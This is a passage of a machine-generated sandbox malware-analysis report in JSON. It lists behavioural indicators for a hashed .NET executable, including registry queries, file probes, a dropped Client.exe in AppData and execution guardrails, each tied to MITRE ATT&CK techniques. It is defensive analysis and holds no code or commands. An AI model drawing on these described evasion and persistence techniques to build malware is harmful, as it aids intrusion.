installation language", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe.config\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Client\\\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.INI\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe.Local\\\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe:Zone.Identifier\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\Client.exe:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" queries basic process information of the \"C:\\Windows\\System32\\cryptsp.dll\" (UID: 5644)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"Client.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- [targetUID: 00000000-00005644]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"70BCEB4E3E62015B87DE30E1063F0DD64C2D43255211845D64EF508D05E17FF2\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"INSTALLROOT\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"CLRLOADLOGDIR\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"USELEGACYV2RUNTIMEACTIVATIONPOLICYDEFAULTVALUE\"; Value: \"\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"ONLYUSELATESTCLR\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Tries to sleep for a long time (more than two minutes)\n Matched sigs: Found a reference to an external IP address lookup service", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "Found reference to \"PbeSha1_RC2_40\" (Indicator: \"RC2\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"RC2_CBC_40\" (Indicator: \"RC2\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"SRTP_NULL_HMAC_SHA1_80\" (Indicator: \"HMAC\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"SRTP_AES128_CM_HMAC_SHA1_80\" (Indicator: \"HMAC\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"HMAC_SHA1\" (Indicator: \"HMAC\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"EncryptionECDsaWithSha1\" (Indicator: \"ECDsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"TRAILER_SHA512\" (Indicator: \"SHA512\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"ecka_eg_X963kdf_SHA512\" (Indicator: \"SHA512\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"sphincs256_with_SHA512\" (Indicator: \"SHA512\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"xmss_with_SHA512\" (Indicator: \"SHA512\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"xmss_mt_with_SHA512\" (Indicator: \"SHA512\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"ecdsa_plain_SHA512\" (Indicator: \"SHA512\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"EncryptionECDsaWithSha512\" (Indicator: \"ECDsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"SRTP_NULL_HMAC_SHA1_32\" (Indicator: \"HMAC\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"SRTP_AES128_CM_HMAC_SHA1_32\" (Indicator: \"HMAC\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"Aes192\" (Indicator: \"Aes\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"ECDsaWithSha2\" (Indicator: \"ECDsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"TRAILER_SHA512_224\" (Indicator: \"SHA512\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"EncryptionECDsaWithSha224\" (Indicator: \"ECDsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"RC2_64\" (Indicator: \"RC2\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to \"TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384\" (Indicator: \"SHA384\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-338", "type": 2, "relevance": 1, "name": "Contains ability to perform Base64 encoding/decoding", "description": "Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/3\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/3\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-513", "type": 2, "relevance": 1, "name": "References to WMI query strings used for process discovery", "description": "Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100009058240004f65b00145cfb76435cfb76d0f65b0001000000940122000100000084f55b00935cfc7640830377d4a0fb76a9da5777d0f65b00010000000100000058c024000000000054f55b0084f55b00f0f55b0095e1f776d52bf701feffffffd4a0fb761bbef8740000037600000000 (UID: 00000000-00005644)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-3", "type": 1, 